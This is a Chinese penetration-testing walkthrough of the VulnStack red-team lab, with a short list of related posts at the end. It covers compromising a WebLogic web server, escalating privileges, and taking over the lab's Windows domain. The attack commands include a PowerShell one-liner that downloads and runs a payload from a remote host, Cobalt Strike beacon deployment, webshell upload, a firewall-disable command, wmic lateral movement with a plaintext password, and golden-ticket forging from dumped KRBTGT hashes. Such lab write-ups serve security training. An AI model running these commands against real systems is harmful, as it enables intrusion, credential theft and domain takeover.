红日安全内网渗透笔记
靶场下载地址:漏洞详情
环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园
此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC
第一步:信息收集(模拟黑盒测试)
已知WEB机的IP地址,用syn包进行扫描。
nmap -sS -v 192.168.111.80
获得开放端口
WEB服务器:
Nmap scan report for 192.168.111.80
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn Samba服务 存在爆破/未授权访问/远程命令执行漏洞
445/tcp open microsoft-ds smb服务 ms17-010/端口溢出漏洞
1433/tcp open ms-sql-s 存在mssql服务 存在爆破/注入/SA弱口令
3389/tcp open ms-wbt-server 存在远程桌面
7001/tcp open afs3-callback weblogic漏洞
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
MAC Address: 00:0C:29:68:D3:5F (VMware)
whatWEB扫描
whatweb http://192.168.111.80:7001
得到信息:
http://192.168.111.80:7001 [404 Not Found]Country[RESERVED][ZZ], IP[192.168.111.80],Java[2.1][Servlet/2.5],Title[Error 404--Not Found],
X-Powered-By[Servlet/2.5 JSP/2.1]
观察知道这是一个java开发的WEB,那就扫扫看有没有java类的漏洞
工具地址:GitHub - rabbitmask/WeblogicScan: Weblogic一键漏洞检测工具,V1.5,更新时间:20200730
利用到WeblogicScan来扫描
python3 WeblogicScan.py -u 192.168.111.80 -p 7001
得到漏洞信息:
[192.168.111.80:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.111.80:7001] Weblogic console address is exposed! The path is: http://192.168.111.80:7001/console/login/LoginForm.jsp
[+] [192.168.111.80:7001] Weblogic UDDI module is exposed! The path is: http://192.168.111.80:7001/uddiexplorer/
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-0638
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-3510
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-10271
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3248
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3506
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2628
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2893
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2894
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[-] [192.168.111.80:7001] weblogic not detected CVE-2019-2890
发现两个java序列化漏洞
扫描WEB目录:
dirb http://192.168.111.80:7001
获得信息
-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Sun Apr 10 02:14:41 2022
URL_BASE: http://192.168.111.80:7001/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt--------------------- Scanning URL: http://192.168.111.80:7001/ ----
+ http://192.168.111.80:7001/console (CODE:200|SIZE:416)
==> DIRECTORY: http://192.168.111.80:7001/uddi/
DIRECTORY: http://192.168.111.80:7001/uddiexplorer/ ---- Entering directory: http://192.168.111.80:7001/uddi/ ----
==> DIRECTORY: http://192.168.111.80:7001/uddi/images/ ---- Entering directory: http://192.168.111.80:7001/uddi/images/ ---------------------
END_TIME: Sun Apr 10 02:15:21 2022
DOWNLOADED: 13836 - FOUND: 1
都去访问一下就知道,uddi目录是没有权限进入的,但是uddiexplorer可以进入,这里将成为我们大马的安家之地。
第二步 漏洞利用:
使用java 反序列化终极测试工具测试漏洞
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip - 开发实例、源码下载 - 好例子网
执行命令权限administrator,webshell上传一个jsp大马,利用文件管理寻找前面分析的uddiexplorer这个目录。
上传shell
上传的冰蝎我没成功,无法连接,但是我上传其他的大马。
github有很多,搜索关键词shell就可以找到!
可能是版本问题,java,或者命令行转义问题等。。。
powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://172.16.250.3:8022/a')
这条命令的CS利用,我并没有成功。但是我发现file upload是可以用的,于是我决定用beacon.exe来获取shell,上线CS
第三步 上线CS:
CS制作小马
获得一个beacon.exe
利用浏览器的大马上传这个beancon.exe 到 windows/temp/
然后进入cmd执行里执行这句话:
.... 发现CS就上线了
提权:
利用漏洞提权:
jsp大马中
----------------
先输入这条代码:systeminfo>C:\Windows\Temp\a.txt&(for %i in (
KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB2503665 KB3031432) do @type C:\Windows\Temp\a.txt|@find /I "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
下面是漏洞对照表:
----------------------------------------
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS15-097 [KB3089656] [remote code execution] (win8.1/2012)
MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)
MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)
MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)
MS14-070 [KB2989935] [Kernel Driver] (2003)
MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)
MS14-002 [KB2914368] [NDProxy] (2003/XP)
MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)
MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)
MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)
MS11-080 [KB2592799] [AFD.sys] (2003/XP)
MS11-062 [KB2566454] [NDISTAPI] (2003/XP)
MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)
MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)
MS10-092 [KB2305420] [Task Scheduler] (2008/7)
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)
MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)
MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)
MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)
MS08-068 [KB957097] [Remote Code Execution] (2000/XP)
MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)
MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)
MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
随便找个漏洞的exp来提权,我这里就跳过上传步骤了,直接到CS上线
Win64.exe是exp
CS下执行找个:
shell C:\Windows\Temp\Win64.exe "C:\Windows\Temp\beacon5.exe"
执行后CS上线
域信息收集
ipconfig /all
查看域名 net config workstation
关闭防火墙 netsh advfirewall set allprofiles state off
查看有几个域 net view /domain
查看域内主机 nei view
查询域内用户 net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员 net group "domain admins" /domain
查看域控 net group "domain controllers" /domain
Portscan
然后在tagert里面psexec上线DC的CS
接下来,讲讲如何利用CS做socks4a 来获取AD机器Cs上线
一样的,上传这个beacon.exe 到AD机上,WEB机上用IPC来vmic命令远程执行
命令如下
shell wmic /node:10.10.10.10 /user:administrator /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"
user可以改成de1ay,改谁就获得谁CS上线的权限
4.2黄金票据利用
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
cs的DUmp hashs 和 Run Mimikatz 获得KRBTGT的hash值和域的SID
Golden Ticket 就是黄金票据。
制作完成后,在tagert上线时候
即使AD机改了管理员密码,你依然可以利用这个票据来获得管理员权限上线AD机
参考:
【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园
红日安全内网渗透笔记相关推荐
- 三层内网渗透笔记-靶场(teamssix.com)
环境搭建 参考:https://blog.csdn.net/qq_63844103/article/details/126195711 宝塔映射 端口 target 1和target2 开始: tar ...
- 红日靶场--内网渗透练习
目录 环境介绍 信息收集 内网主机存活扫描 masscan扫描 Nmap扫描 访问80端口 目录扫描 漏洞利用 探测phpstudy的phpmyadmin目录 爆破数据库密码 phpmyadm ...
- 内网渗透笔记——二层发现
一.OSI七层模型 物理层 数据链路层 网络层 传输层 会话层 表示层 应用层 那所谓二层发现(交换机,mac地址,arp),就是利用数据链路层进行主机的发现 三层--利用ping命令 arping命 ...
- 内网渗透笔记——msf
Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟 nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000 ...
- 内网渗透笔记——:)一个笑脸
打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials ...
- 内网渗透笔记——三层发现and四层发现
三层发现(网络层) 最常用ping命令,但是如果防火墙一开,就无法ping到对方.三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户 fping -a ...
- 内网渗透笔记——注册表自启动与msi提权
目的:进行持久化的连接 最简单的自启动: 自启动文件夹:开始➡程序➡启动(win7下) 除了通过文件夹,还可以利用Windows配置文件: win.ini.system.ini.wininit.ini ...
- 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...
最新文章
- write up 杂项:telenet
- ESFramework介绍之(31)―― 消息分类及对应的处理器
- jquery的2.0.3版本源码系列(2):21行-94行定义了一些变量和函数 jQuery=function(){}
- 计算机专业英语第07章,计算机专业英语电子教案第07章.ppt
- 正则表达式 基础认识
- elixir官方入门教程 递归
- JAVA提取字符串信息中的数字(包括整数,小数)工具类
- 如何在mysql命令窗口获取到程序正在执行的sql语句
- [项目回顾]基于Redis的在线用户列表解决方案
- 安捷伦or是德信号源+频谱仪操作: 从程控到自动测试 (四)平坦度检测的程控实现
- “恩智浦”杯智能车竞赛总结
- 2008 r2安装总是跳出 server sql_关于sql server 2008 r2 安装闪退问题解决办法
- tampermonkey(油猴)跨域发送请求
- 硬盘柱面损坏怎么办_最靠谱的机械硬盘坏道修复工具一:DiskGenius
- 移植Python3到TQ2440(二)
- 好用到爆的桌面电子教鞭zoomit
- 四、最小生成树——普里姆(Prim)算法
- Oracle-SQL-group by-报错:不是单组分组函数
- MIME Types MIME 类型
- HTML 中的各种标记简介